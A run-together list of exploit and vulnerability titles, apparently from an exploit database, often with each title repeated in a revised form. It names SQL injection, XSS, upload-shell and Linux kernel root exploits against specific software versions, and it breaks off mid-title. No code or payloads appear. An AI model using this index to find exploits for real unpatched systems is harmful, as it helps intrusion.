Vulnerabilities clean CMS 1.5 (blind SQL Injection/XSS) Multiple Vulnerabilities chipmunk topsites - (auth bypass/XSS) Multiple Vulnerabilities clean CMS 1.5 - (blind SQL Injection/XSS) Multiple Vulnerabilities Ocean12 Contact Manager Pro (SQL/XSS/DDV) Multiple Vulnerabilities Ocean12 Contact Manager Pro - (SQL/XSS/DDV) Multiple Vulnerabilities comersus asp shopping cart (dd/XSS) Multiple Vulnerabilities comersus asp shopping cart - (DD/XSS) Multiple Vulnerabilities minimal ablog 0.4 (SQL/fu/bypass) Multiple Vulnerabilities minimal ablog 0.4 - (SQL/fu/bypass) Multiple Vulnerabilities Ocean12 Mailing List Manager Gold (DD/SQL/XSS) Vulnerabilities Ocean12 Mailing List Manager Gold - (DD/SQL/XSS) Vulnerabilities wbstreet 1.0 (SQL/dd) Multiple Vulnerabilities wbstreet 1.0 - (SQL/DD) Multiple Vulnerabilities template creature (SQL/dd) Multiple Vulnerabilities template creature - (SQL/DD) Multiple Vulnerabilities merlix educate servert (bypass/dd) Multiple Vulnerabilities merlix educate servert - (bypass/DD) Multiple Vulnerabilities nightfall personal diary 1.0 - (XSS/dd) Multiple Vulnerabilities Merlix Teamworx Server (DD/Bypass) Multiple Remote Vulnerabilities nightfall personal diary 1.0 - (XSS/DD) Multiple Vulnerabilities Merlix Teamworx Server - (DD/Bypass) Multiple Remote Vulnerabilities asp autodealer (SQL/dd) Multiple Vulnerabilities asp autodealer - (SQL/DD) Multiple Vulnerabilities aspmanage banners (rfu/dd) Multiple Vulnerabilities aspmanage banners - (RFU/DD) Multiple Vulnerabilities asp talk (SQL/css) Multiple Vulnerabilities asp talk - (SQL/css) Multiple Vulnerabilities siu guarani Multiple Vulnerabilities siu guarani - Multiple Vulnerabilities webcaf <= 1.4 - (LFI/rce) Multiple Vulnerabilities webcaf <= 1.4 - (LFI/RCE) Multiple Vulnerabilities postecards (SQL/dd) Multiple Vulnerabilities postecards - (SQL/DD) Multiple Vulnerabilities living Local 1.1 - (XSS-rfu) Multiple Vulnerabilities living Local 1.1 - (XSS/rfu) Multiple Vulnerabilities cf shopkart 5.2.2 (SQL/dd) Multiple Vulnerabilities cf shopkart 5.2.2 - (SQL/DD) Multiple Vulnerabilities the net guys aspired2blog (SQL/dd) Multiple Vulnerabilities the net guys aspired2blog - (SQL/dd) Multiple Vulnerabilities joomla live chat (SQL/proxy) Multiple Vulnerabilities joomla live chat - (SQL/proxy) Multiple Vulnerabilities isweb CMS 3.0 (SQL/XSS) Multiple Vulnerabilities isweb CMS 3.0 - (SQL/XSS) Multiple Vulnerabilities clickandemail (SQL/XSS) Multiple Vulnerabilities click&rank (SQL/XSS) Multiple Vulnerabilities clickandemail - (SQL/XSS) Multiple Vulnerabilities click&rank - (SQL/XSS) Multiple Vulnerabilities Liberum Help Desk 0.97.3 (SQL/DD) Remote Vulnerabilities Zelta E Store (RFU/BYPASS/R-SQL/B-SQL) Multiple Vulnerabilities Liberum Help Desk 0.97.3 - (SQL/DD) Remote Vulnerabilities Zelta E Store - (RFU/BYPASS/R-SQL/B-SQL) Multiple Vulnerabilities 2532/gigs 1.2.2 - stable Multiple Vulnerabilities 2532/gigs 1.2.2 stable - Multiple Vulnerabilities constructr CMS <= 3.02.5 stable Multiple Vulnerabilities constructr CMS <= 3.02.5 stable - Multiple Vulnerabilities chicomas <= 2.0.4 (DB Backup/DD/XSS) Multiple Vulnerabilities chicomas <= 2.0.4 - (DB Backup/DD/XSS) Multiple Vulnerabilities yourplace <= 1.0.2 - Multiple Vulnerabilities + rce Exploit yourplace <= 1.0.2 - Multiple Vulnerabilities + RCE Exploit doop CMS <= 1.4.0b (CSRF/upload shell) Multiple Vulnerabilities doop CMS <= 1.4.0b - (CSRF/upload shell) Multiple Vulnerabilities Nokia S60 SMS/Mms (Curse of Silence) Denial of Service Vulnerability Nokia S60 SMS/MMS (Curse of Silence) - Denial of Service Vulnerability Seo4SMF for SMF forums Multiple Vulnerabilities Seo4SMF for SMF forums - Multiple Vulnerabilities mkportal <= 1.2.1 () Multiple Vulnerabilities mkportal <= 1.2.1 - Multiple Vulnerabilities rankem (dd/XSS/cm) Multiple Vulnerabilities blogit! (SQL/dd/XSS) Multiple Vulnerabilities rankem - (DD/XSS/cm) Multiple Vulnerabilities blogit! - (SQL/DD/XSS) Multiple Vulnerabilities E-ShopSystem Auth Bypass / SQL Injection Multiple Vulnerabilities E-ShopSystem - (Auth Bypass / SQL Injection) Multiple Vulnerabilities Motorola Wimax modem CPEi300 (FD/XSS) Multiple Vulnerabilities Motorola Wimax modem CPEi300 - (FD/XSS) Multiple Vulnerabilities navicopa webserver 3.0.1 (bof/sd) Multiple Vulnerabilities navicopa webserver 3.0.1 - (bof/sd) Multiple Vulnerabilities Power System Of Article Management 3.0 - (DD/XSS) Vulnerabilities team 1.x - (dd/XSS) Multiple Vulnerabilities Power System Of Article Management 3.0 - (DD/XSS) Multiple Vulnerabilities team 1.x - (DD/XSS) Multiple Vulnerabilities gr blog 1.1.4 (upload/bypass) Multiple Vulnerabilities gr blog 1.1.4 - (upload/bypass) Multiple Vulnerabilities zeroboard4 pl8 (07.12.17) Multiple Vulnerabilities zeroboard4 pl8 (07.12.17) - Multiple Vulnerabilities SilverNews 2.04 (Auth Bypass/LFI/RCE) Multiple Vulnerabilities SilverNews 2.04 - (Auth Bypass/LFI/RCE) Multiple Vulnerabilities w3bcms <= 3.5.0 - Multiple Vulnerabilities Exploit w3bcms <= 3.5.0 - Multiple Vulnerabilities powermovielist 0.14b (SQL/XSS) Multiple Vulnerabilities powermovielist 0.14b - (SQL/XSS) Multiple Vulnerabilities ritsblog 0.4.2 (ab/XSS) Multiple Vulnerabilities Zabbix 1.6.2 Frontend Multiple Vulnerabilities blindblog 1.3.1 (SQL/ab/LFI) Multiple Vulnerabilities ritsblog 0.4.2 - (ab/XSS) Multiple Vulnerabilities Zabbix 1.6.2 - Frontend - Multiple Vulnerabilities blindblog 1.3.1 - (SQL/ab/LFI) Multiple Vulnerabilities phpCommunity 2.1.8 (SQL/DT/XSS) Multiple Vulnerabilities phpCommunity 2.1.8 - (SQL/DT/XSS) Multiple Vulnerabilities Telnet-Ftp Service Server 1.x - Multiple Vulnerabilities (Post Auth) Telnet-Ftp Service Server 1.x - (Post Auth) Multiple Vulnerabilities Femitter FTP Server 1.x - Multiple Vulnerabilities (post auth) Femitter FTP Server 1.x - (Post Auth) Multiple Vulnerabilities Diskos CMS Manager (SQL/DB/Auth Bypass) Multiple Vulnerabilities Diskos CMS Manager - (SQL/DB/Auth Bypass) Multiple Vulnerabilities Linux Kernel 2.6 - UDEV Local Privilege Escalation Exploit Linux Kernel 2.6 (Debian / Ubuntu / Gentoo) - UDEV Local Privilege Escalation Exploit flatnux 2009-03-27 (upload/id) Multiple Vulnerabilities flatnux 2009-03-27 - (upload/id) Multiple Vulnerabilities fungamez rc1 (ab/LFI) Multiple Vulnerabilities fungamez rc1 - (ab/LFI) Multiple Vulnerabilities mixedcms 1.0b (LFI/su/ab/fd) Multiple Vulnerabilities mixedcms 1.0b - (LFI/su/ab/fd) Multiple Vulnerabilities fowlcms 1.1 (ab/LFI/su) Multiple Vulnerabilities fowlcms 1.1 - (ab/LFI/su) Multiple Vulnerabilities dwebpro 6.8.26 (dt/fd) Multiple Vulnerabilities dwebpro 6.8.26 - (dt/fd) Multiple Vulnerabilities Linux Kernel 2.6.x - SCTP FWD Memory Corruption Remote Exploit Linux Kernel 2.6.x (<= 2.6.20 / <= 2.6.24 / <= 2.6.27_7-10) (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit Linux Kernel 2.6 UDEV < 141 - Local Privilege Escalation Exploit Linux Kernel 2.6 UDEV < 141 (Gentoo / Ubuntu 8.10/9.04) - Local Privilege Escalation Exploit leap CMS 0.1.4 (SQL/XSS/su) Multiple Vulnerabilities leap CMS 0.1.4 - (SQL/XSS/su) Multiple Vulnerabilities tematres 1.0.3 (auth bypass/SQL/XSS) Multiple Vulnerabilities tematres 1.0.3 - (auth bypass/SQL/XSS) Multiple Vulnerabilities Linux Kernel 2.6.x - ptrace_attach Local Privilege Escalation Exploit Linux Kernel 2.6.x (Gentoo 2.6.29rc1) - ptrace_attach Local Privilege Escalation Exploit 2daybiz business community script Multiple Vulnerabilities Easy Scripts Answer and Question Script Multiple Vulnerabilities 2daybiz business community script - Multiple Vulnerabilities Easy Scripts Answer and Question Script - Multiple Vulnerabilities my-colex 1.4.2 (ab/XSS/SQL) Multiple Vulnerabilities my-gesuad 0.9.14 (ab/SQL/XSS) Multiple Vulnerabilities my-colex 1.4.2 - (ab/XSS/SQL) Multiple Vulnerabilities my-gesuad 0.9.14 - (ab/SQL/XSS) Multiple Vulnerabilities vidshare pro (SQL/XSS) Multiple Vulnerabilities vidshare pro - (SQL/XSS) Multiple Vulnerabilities Mac OS X - Java applet Remote Deserialization Remote PoC (updated) Mac OS X - Java applet Remote Deserialization Remote PoC (Updated) asp inline corporate calendar (SQL/XSS) Multiple Vulnerabilities asp inline corporate calendar - (SQL/XSS) Multiple Vulnerabilities minitwitter 0.3-beta (SQL/XSS) Multiple Vulnerabilities minitwitter 0.3-beta - (SQL/XSS) Multiple Vulnerabilities elitecms 1.01 (SQL/XSS) Multiple Vulnerabilities elitecms 1.01 - (SQL/XSS) Multiple Vulnerabilities flashlight free edition (LFI/SQL) Multiple Vulnerabilities flashlight free edition - (LFI/SQL) Multiple Vulnerabilities propertymax pro free (SQL/XSS) Multiple Vulnerabilities propertymax pro free - (SQL/XSS) Multiple Vulnerabilities podcast generator <= 1.2 - globals[] Multiple Vulnerabilities podcast generator <= 1.2 - globals[] - Multiple Vulnerabilities kloxo 5.75 (24 issues) Multiple Vulnerabilities kloxo 5.75 - (24 issues) Multiple Vulnerabilities virtue news (SQL/XSS) Multiple Vulnerabilities virtue news - (SQL/XSS) Multiple Vulnerabilities mrcgiguy the ticket system 2.0 php Multiple Vulnerabilities mrcgiguy the ticket system 2.0 php - Multiple Vulnerabilities mrcgiguy freeticket (ch/SQL) Multiple Vulnerabilities mrcgiguy freeticket - (ch/SQL) Multiple Vulnerabilities impleo music collection 2.0 (SQL/XSS) Multiple Vulnerabilities impleo music collection 2.0 - (SQL/XSS) Multiple Vulnerabilities kasseler CMS (fd/XSS) Multiple Vulnerabilities kasseler CMS - (fd/XSS) Multiple Vulnerabilities tribiq CMS 5.0.12c (XSS/LFI) Multiple Vulnerabilities tribiq CMS 5.0.12c - (XSS/LFI) Multiple Vulnerabilities Virtue Online Test Generator (AB/SQL/XSS) Multiple Vulnerabilities Virtue Online Test Generator - (AB/SQL/XSS) Multiple Vulnerabilities Linux Kernel <= 2.6.28.3 - set_selection() UTF-8 Off By One Local Exploit (x86-64) Linux Kernel <= 2.6.24_16-23 / <= 2.6.28.3 (Ubuntu 8.04/8.10 & Fedora Core 10) (x86-64) - set_selection() UTF-8 Off By One Local Exploit Siteframe CMS 3.2.x SQL Injection/phpinfo() Multiple Vulnerabilities Siteframe CMS 3.2.x - (SQL Injection/phpinfo()) Multiple Vulnerabilities citrix xencenterweb - (XSS/SQL/rce) Multiple Vulnerabilities citrix xencenterweb - (XSS/SQL/RCE) Multiple Vulnerabilities FreeBSD 6/8 (ata device) Local Denial of Service Exploit FreeBSD 6/8 - (ata device) Local Denial of Service Exploit good/bad vote (XSS/LFI) Multiple Vulnerabilities good/bad vote - (XSS/LFI) Multiple Vulnerabilities Linux Kernel 2.6.30 <= 2.6.30.1 / SELinux / RHEL5 - Test Kernel Local Root Exploit (0day) Linux Kernel 2.6.30 <= 2.6.30.1 / SELinux (RHEL5) - Kernel Local Root Exploit (0day) mcshoutbox 1.1 (SQL/XSS/shell) Multiple Vulnerabilities mcshoutbox 1.1 - (SQL/XSS/shell) Multiple Vulnerabilities DD-WRT (httpd service) Remote Command Execution Vulnerability DD-WRT - (httpd service) Remote Command Execution Vulnerability tenrok 1.1.0 (udd/rce) Multiple Vulnerabilities tenrok 1.1.0 - (udd/RCE) Multiple Vulnerabilities logoshows bbs 2.0 (dd/ich) Multiple Vulnerabilities logoshows bbs 2.0 - (DD/ich) Multiple Vulnerabilities Linux Kernel 2.x - sock_sendpage() Local Ring0 Root Exploit (1) Linux Kernel 2.x (Redhat) - sock_sendpage() Ring0 Local Root Exploit (1) Linux Kernel 2.4 / 2.6 - sock_sendpage() ring0 Root Exploit (1) Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - sock_sendpage() ring0 Root Exploit (1) Linux Kernel <= 2.6.31-rc7 - AF_LLC getsockname 5-Byte Stack Disclosure Linux Kernel <= 2.6.31-rc7 - AF_LLC getsockname 5-Byte Stack Disclosure Proof of Concept Linux Kernel 2.6 < 2.6.19 - (32-bit) ip_append_data() ring0 Root Exploit Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6) - (32-bit) ip_append_data() ring0 Root Exploit Linux Kernel 2.4 / 2.6 - sock_sendpage() Local Root Exploit (PPC Edition) Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SUSE 10 SP2/11 / Ubuntu 8.10) - sock_sendpage() Local Root (PPC) Linux Kernel < 2.6.19 - udp_sendmsg Local Root Exploit (x86/x64) Linux Kernel < 2.6.19 - udp_sendmsg Local Root Exploit Linux Kernel < 2.6.19 (x86/x64) - udp_sendmsg Local Root Exploit Linux Kernel < 2.6.19 (Debian 4) - udp_sendmsg Local Root Exploit Linux Kernel 2.4 / 2.6 - sock_sendpage() Local Root Exploit (2) Linux Kernel 2.4 / 2.6 (Fedora 11) - sock_sendpage() Local Root Exploit (2) Joomla Hotel Booking System - XSS/SQL Injection Multiple Vulnerabilities Joomla Hotel Booking System - (XSS/SQL Injection) Multiple Vulnerabilities Alteon OS BBI (Nortell) - Multiple Vulnerabilities XSS and CSRF Alteon OS BBI (Nortell) - (XSS and CSR) Multiple Vulnerabilities Linux Kernel - 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty Linux Kernel - 'pipe.c' Local Privilege Escalation Vulnerability Linux Kernel 2.6.x - 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty Linux Kernel <= 2.6.32 - 'pipe.c' Local Privilege Escalation Vulnerability Linux Kernel - 'unix_stream_connect()' Local Denial of Service Vulnerability Linux Kernel <= 2.6.31.4 - 'unix_stream_connect()' Local Denial of Service Vulnerability Unreal Tournament 2004 - _Secure_ Overflow Unreal Tournament 2004 - 'Secure' Overflow VMWare Fusion <= 2.0.5 - vmx86 kext Local kernel Root Exploit VMWare Fusion <= 2.0.5 - vmx86 kext Kernel Local Root Exploit PHP < 5.3.1 - _multipart/form-data_ Denial of Service Exploit (Python) PHP < 5.3.1 - 'multipart/form-data' Denial of Service Exploit (Python) sugar crm 5.5.0.rc2 and 5.2.0j Multiple Vulnerabilities sugar crm 5.5.0.rc2 and 5.2.0j - Multiple Vulnerabilities Huawei MT882 Modem/Router Multiple Vulnerabilities Huawei MT882 Modem/Router - Multiple Vulnerabilities DigitalHive Multiple Vulnerabilities DigitalHive - Multiple Vulnerabilities zabbix server Multiple Vulnerabilities zabbix server - Multiple Vulnerabilities Ez Faq Maker Multiple Vulnerabilities Ez Faq Maker - Multiple Vulnerabilities Ez Blog 1.0 - XSS/CSRF Multiple Vulnerabilities Ez Blog 1.0 - (XSS/CSRF) Multiple Vulnerabilities Recipe Script 5.0 - Shell Upload/CSRF/XSS Multiple Vulnerabilities Recipe Script 5.0 - (Shell Upload/CSRF/XSS) Multiple Vulnerabilities eUploader PRO 3.1.1 - CSRF/XSS Multiple Vulnerabilities eUploader PRO 3.1.1 - (CSRF/XSS) Multiple Vulnerabilities Horde 3.3.5 - _PHP_SELF_ XSS Vulnerability Horde 3.3.5 - 'PHP_SELF' XSS Vulnerability Lizard Cart Upload Shell Vulnerability Lizard Cart - Upload Shell Vulnerability Mega Upload Upload Shell Vulnerability Mega Upload 1.45 - Upload Shell Vulnerability MyCart shopping cart Upload Shell Vulnerability oscommerce <= 2.2rc2a Bypass/Create and Download Backup Vulnerability MyCart shopping cart - Upload Shell Vulnerability osCommerce <= 2.2rc2a - Bypass/Create and Download Backup Vulnerability gallery_show.asp GID suffer from Blind SQL Injection Vulnerability gallery_show.asp - GID Blind SQL Injection Vulnerability Mini-NUKE 2.3 - Freehost Multiple Vulnerabilities Mini-NUKE 2.3 Freehost - Multiple Vulnerabilities VirtualDJ Trial 6.0.6 - _New Year Edition_ - (.m3u) Exploit (0day) VirtualDJ Trial 6.0.6 - 'New Year Edition' - (.m3u) Exploit (0day) PHPDirector Game Edition 0.1 - Multiple Vulnerabilities (LFI/SQLi/XSS) PHPDirector Game Edition 0.1 - (LFI/SQLi/XSS) Multiple Vulnerabilities Docebo 3.6.0.2 (stable) Local File Inclusion Docebo 3.6.0.2 (stable) - Local File Inclusion CLONEBID B2B Marketplace Multiple Vulnerabilities ITechSctipts Alibaba Clone Multiple Vulnerabilities CLONEBID B2B Marketplace - Multiple Vulnerabilities ITechSctipts Alibaba Clone - Multiple Vulnerabilities ManageEngine OpUtils 5 - _Login.DO_ SQL Injection Vulnerability ManageEngine OpUtils 5 - 'Login.DO' SQL Injection Vulnerability CMS by MyWorks Multiple Vulnerabilities CMS by MyWorks - Multiple Vulnerabilities DZ Auktionshaus _V4.rgo_ (id) news.php - SQL Injection Vulnerability DZ Auktionshaus 'V4.rgo' (id) news.php - SQL Injection Vulnerability PhpCityPortal Multiple Vulnerabilities PhpCityPortal - Multiple Vulnerabilities Joomla Component com_ckforms Multiple Vulnerabilities Joomla Component com_ckforms - Multiple Vulnerabilities Joomla Component com_vxdate Multiple Vulnerabilities Joomla Component com_vxdate - Multiple Vulnerabilities Adult Video Site Script Multiple Vulnerabilities Adult Video Site Script - Multiple Vulnerabilities iOS Safari - Bad _VML_ Remote DoS iOS Safari - Bad 'VML' Remote DoS Linux Kernel <= 2.6.34-rc3 ReiserFS xattr - Privilege Escalation Linux Kernel <= 2.6.34-rc3 ReiserFS xattr (Redhat/Ubuntu 9.10) - Privilege Escalation vBulletin _Cyb - Advanced Forum Statistics_ DoS vBulletin 'Cyb - Advanced Forum Statistics' DoS dl_stats Multiple Vulnerabilities dl_stats - Multiple Vulnerabilities avtech software (avc781viewer.dll) ActiveX Multiple Vulnerabilities avtech software (avc781viewer.dll) ActiveX - Multiple Vulnerabilities lanewsfactory Multiple Vulnerabilities lanewsfactory - Multiple Vulnerabilities MacOS X 10.6 HFS File System Attack (Denial of Service) MacOS X 10.6 - HFS File System Attack (Denial of Service) WFTPD Server 3.30 - Multiple Vulnerabilities (0day) WFTPD Server 3.30 - (0day) Multiple Vulnerabilities CompactCMS 1.4.0 (tiny_mce) Remote File Upload CompactCMS 1.4.0 (tiny_mce) - Remote File Upload Tainos Multiple Vulnerabilities Tainos - Multiple Vulnerabilities Joomla Component com_event Multiple Vulnerabilities Joomla Component com_event - Multiple Vulnerabilities B-Hind CMS (tiny_mce) Remote File Upload B-Hind CMS (tiny_mce) - Remote File Upload ComponentOne VSFlexGrid 7 & 8 - _Archive()_ method Remote Buffer Overflow Exploit ComponentOne VSFlexGrid 7 & 8 - 'Archive()' method Remote Buffer Overflow Exploit (Gabriel's FTP Server) Open & Compact FTP Server 1.2 - _PORT_ Command Remote DoS (Gabriel's FTP Server) Open & Compact FTP Server 1.2 - 'PORT' Command Remote DoS Blaze Apps Multiple Vulnerabilities Blaze Apps - Multiple Vulnerabilities Joomla Component My Car Multiple Vulnerabilities Joomla Component My Car - Multiple Vulnerabilities Marketing Web Design Multiple Vulnerabilities Marketing Web Design - Multiple Vulnerabilities Aim Web Design Multiple Vulnerabilities Aim Web Design - Multiple Vulnerabilities Zeeways Script Multiple Vulnerabilities Zeeways Script - Multiple Vulnerabilities QuickTalk 1.2 - Multiple Vulnerabilities (Source Code Disclosure) QuickTalk 1.2 - (Source Code Disclosure) Multiple Vulnerabilities Joomla Component ChronoConnectivity Joomla Component ChronoForms (com_chronocontact) Joomla Component ChronoConnectivity (com_chronoconnectivity) - Blind SQL Injection Vulnerability Joomla Component ChronoForms (com_chronocontact) - Blind SQL Injection Vulnerability Simple Posting System Multiple Vulnerabilities Simple Posting System - Multiple Vulnerabilities Joomla Component com_djartgallery Multiple Vulnerabilities Joomla Component com_djartgallery - Multiple Vulnerabilities Miniweb 2.0 Business Portal and Social Networking Platform SQL Injection Miniweb 2.0 Business Portal and Social Networking Platform - SQL Injection E-PHP B2B Marketplace Multiple Vulnerabilities E-PHP B2B Marketplace - Multiple Vulnerabilities DaLogin Multiple Vulnerabilities DaLogin - Multiple Vulnerabilities Novell iManager Multiple Vulnerabilities Novell iManager - Multiple Vulnerabilities 2DayBiz Video Community portal - _user-profile.php_ SQL Injection Vulnerability 2DayBiz Real Estate Portal - _viewpropertydetails.php_ SQL injection 2DayBiz Video Community portal - 'user-profile.php' SQL Injection Vulnerability 2DayBiz Real Estate Portal - 'viewpropertydetails.php' SQL injection NO-IP.com Dynamic DNS Update Client 2.2.1 - _Request_ Insecure Encoding Algorithm NO-IP.com Dynamic DNS Update Client 2.2.1 - 'Request' Insecure Encoding Algorithm TCW PHP Album Multiple Vulnerabilities Esoftpro Online Guestbook Pro Multiple Vulnerabilities TCW PHP Album - Multiple Vulnerabilities Esoftpro Online Guestbook Pro - Multiple Vulnerabilities Esoftpro Online Contact Manager Multiple Vulnerabilities Esoftpro Online Contact Manager - Multiple Vulnerabilities Joomla Component Sef (com_sef) - LFI Vulnerability Joomla Component SEF (com_sef) - Local File Inclusion Vulnerability artforms 2.1b7.2 rc2 joomla component Multiple Vulnerabilities artforms 2.1b7.2 rc2 joomla component - Multiple Vulnerabilities Qt 4.6.3 - _QSslSocketBackendPrivate::transmit()_ Denial of Service Qt 4.6.3 - 'QSslSocketBackendPrivate::transmit()' Denial of Service Macs CMS 1.1.4 - Multiple Vulnerabilities (XSS/CSRF) Macs CMS 1.1.4 - (XSS/CSRF) Multiple Vulnerabilities GetSimple CMS 2.01 - Multiple Vulnerabilities (XSS/CSRF) Ubuntu 9.10 (Karmic Koala) & 10.04 LTS (Lucid Lynx) PAM 1.1.0 MOTD - Local Root Exploit GetSimple CMS 2.01 - (XSS/CSRF) Multiple Vulnerabilities PAM 1.1.0 MOTD (Ubuntu 9.10/10.04) - Local Root Exploit Joomla Component QContacts (com_qcontacts) SQL Injection Vulnerability Joomla Component QContacts (com_qcontacts) - SQL Injection Vulnerability Ubuntu 10.04 LTS - Lucid Lynx ftp Client 0.17-19build1 ACCT - Buffer Overflow ftp Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow Microsoft Windows - Win32k.sys Driver _CreateDIBPalette()_ Buffer Overflow Microsoft Windows - Win32k.sys Driver 'CreateDIBPalette()' Buffer Overflow Easy FTP - BoF Vulnerabilities in NLST & NLST -al & APPE & RETR & SIZE & XCWD Commands Zendesk Multiple Vulnerabilities Easy FTP 1.7.0.11 - BoF Vulnerabilities in NLST & NLST -al & APPE & RETR & SIZE & XCWD Commands Zendesk - Multiple Vulnerabilities Mediacoder 0.7.5.4710 - _Universal_ SEH Buffer Overflow Exploit Mediacoder 0.7.5.4710 - 'Universal' SEH Buffer Overflow Exploit Simple Forum PHP Multiple Vulnerabilities Simple Forum PHP - Multiple Vulnerabilities Linux Kernel < 2.6.36-rc1 CAN BCM - Privilege Escalation Exploit Linux Kernel < 2.6.36-rc1 CAN BCM (Ubuntu 10.04 / 2.6.32-21) - Privilege Escalation Exploit Apple QuickTime __Marshaled_pUnk_ Backdoor Param Client-Side Arbitrary Code Execution Apple QuickTime '_Marshaled_pUnk' Backdoor Param Client-Side Arbitrary Code Execution Adobe Acrobat Reader and Flash Player - _newclass_ invalid pointer Adobe Acrobat Reader and Flash Player - 'newclass' invalid pointer Shop a la Cart Multiple Vulnerabilities Shop a la Cart - Multiple Vulnerabilities ifnuke - Multiple Vulnerabilities (0day) ifnuke - (0day) Multiple Vulnerabilities dynpage <= 1.0 - Multiple Vulnerabilities (0day) dynpage <= 1.0 - (0day) Multiple Vulnerabilities sirang web-based d-control Multiple Vulnerabilities sirang web-based d-control - Multiple Vulnerabilities Microsoft Office Visio - .DXF File Stack based Overflow Microsoft Office Visio 2002 - .DXF File Stack based Overflow Mozilla Firefox - XSLT Sort Remote Code Execution Vulnerability Mozilla Firefox 3.6.3 - XSLT Sort Remote Code Execution Vulnerability Zeeways Adserver Multiple Vulnerabilities Zeeways Adserver - Multiple Vulnerabilities Microsoft Office Word 2007 - sprmCMajority Buffer Overflow Microsoft Office Word 2007 SP2 - sprmCMajority Buffer Overflow Adobe Acrobat and Reader - _pushstring_ Memory Corruption Adobe Acrobat and Reader - 'pushstring' Memory Corruption Linux Kernel 2.6.27 < 2.6.36 - x86_64 compat Local Root Exploit Linux Kernel 2.6.27 < 2.6.36 (x86_64) (Redhat) - compat Local Root Exploit Firefox Plugin Parameter EnsureCachedAttrParamArrays - Remote Code Execution Firefox 3.6.4 - Plugin Parameter EnsureCachedAttrParamArrays - Remote Code Execution xt:Commerce Gambio 2008 - 2010 ERROR Based SQL Injection _reviews.php_ xt:Commerce Gambio 2008 - 2010 ERROR Based SQL Injection 'reviews.php' Java CMM readMabCurveData - Stack Overflow Java 6.19 CMM readMabCurveData - Stack Overflow Microsoft drm technology (msnetobj.dll) ActiveX Multiple Vulnerabilities RarCrack 0.2 - _filename_ init() .bss PoC Microsoft drm technology (msnetobj.dll) ActiveX - Multiple Vulnerabilities RarCrack 0.2 - 'filename' init() .bss PoC je guestbook 1.0 joomla component Multiple Vulnerabilities je guestbook 1.0 joomla component - Multiple Vulnerabilities Allpc 2.5 osCommerce SQL/XSS Multiple Vulnerabilities Allpc 2.5 osCommerce - (SQL/XSS) Multiple Vulnerabilities Linux Kernel < 2.6.36-rc6 - pktcdvd Kernel Memory Disclosure Linux Kernel < 2.6.36-rc6 (Redhat/Ubuntu 10.04) - pktcdvd Kernel Memory Disclosure Proof of Concept TradeMC E-Ticaret SQL and XSS Multiple Vulnerabilities TradeMC E-Ticaret (SQL/XSS) Multiple Vulnerabilities Cag CMS 0.2 - XSS & Blind SQL Injection Multiple Vulnerabilities Cag CMS 0.2 - (XSS/Blind SQL Injection) Multiple Vulnerabilities js calendar 1.5.1 joomla component Multiple Vulnerabilities js calendar 1.5.1 joomla component - Multiple Vulnerabilities Oracle Java 6 - OBJECT tag _launchjnlp_/_docbase_ Param Buffer Overflow Exploit Oracle Java 6 - OBJECT tag 'launchjnlp'/'docbase' Param Buffer Overflow Exploit Linux Kernel - VIDIOCSMICROCODE IOCTL Local Memory Overwrite Vulnerability Linux Kernel <= 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite Vulnerability Sybase Advantage Data Architect - _*.SQL_ Format Heap Oveflow Sybase Advantage Data Architect - '*.SQL' Format Heap Oveflow Minishare 1.5.5 - Buffer Overflow Vulnerability (users.txt) Minishare 1.4.0 - 1.5.5 - Buffer Overflow Vulnerability (users.txt) Linux Kernel - Stack Infoleaks Vulnerability Linux Kernel <= 2.4.0 - Stack Infoleaks Vulnerability Joomla Component ccBoard 1.2-RC Multiple Vulnerabilities Joomla Component ccBoard 1.2-RC - Multiple Vulnerabilities CLANSPHERE 2010.0 Final Multiple Vulnerabilities CLANSPHERE 2010.0 Final - Multiple Vulnerabilities Linux Kernel - 'setup_arg_pages()' Denial of Service Vulnerability Linux Kernel <= 2.6.37 - 'setup_arg_pages()' Denial of Service Vulnerability Linux Kernel - Unix Sockets Local Denial of Service Linux Kernel <= 2.6.37 - Unix Sockets Local Denial of Service Site2Nite Big Truck Broker _txtSiteId_ SQL Injection Vulnerability Site2Nite Big Truck Broker - 'txtSiteId' SQL Injection Vulnerability Linux Kernel <= 2.6.37 - Local Privilege Escalation (Full Nelson) Linux Kernel <= 2.6.37 (Redhat / Ubuntu 10.04) - 'Full Nelson' Local Privilege Escalation Habari Blog Multiple Vulnerabilities Habari Blog - Multiple Vulnerabilities Linux Kernel 2.6.34 - CAP_SYS_ADMIN x86 - Local Privilege Escalation Exploit Linux Kernel < 2.6.34 (Ubuntu 10.10) - CAP_SYS_ADMIN x86 - Local Privilege Escalation Exploit (1) F3Site 2011 alfa 1 - Multiple Vulnerabilities (XSS & CSRF) phpMySport 1.4 - Multiple Vulnerabilities (SQLi & Auth Bypass & Path Disclosure) F3Site 2011 alfa 1 - (XSS & CSRF) Multiple Vulnerabilities phpMySport 1.4 - (SQLi & Auth Bypass & Path Disclosure) Multiple Vulnerabilities Linux Kernel < 2.6.34 - CAP_SYS_ADMIN x86 & x64 - Local Privilege Escalation Exploit (2) Linux Kernel < 2.6.34 CAP_SYS_ADMIN x86 & x64 (Ubuntu 110.10) - Local Privilege Escalation Exploit (2) Comcast DOCSIS 3.0 Business Gateways Multiple Vulnerabilities Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities T-Content Managment System Multiple Vulnerabilities T-Content Managment System - Multiple Vulnerabilities Samba _username map script_ Command Execution Samba 'username map script' Command Execution Adobe CoolType SING Table _uniqueName_ Stack Buffer Overflow Adobe CoolType SING Table 'uniqueName' Stack Buffer Overflow Microsoft Internet Explorer - _Aurora_ Memory Corruption Microsoft Internet Explorer - 'Aurora' Memory Corruption Adobe Flash Player _newfunction_ Invalid Pointer Use Adobe Flash Player - 'newfunction' Invalid Pointer Use Adobe CoolType SING Table _uniqueName_ Stack Buffer Overflow Adobe CoolType SING Table 'uniqueName' Stack Buffer Overflow Adobe Flash Player _Button_ Remote Code Execution Adobe Flash Player - 'Button' Remote Code Execution Adobe Flash Player 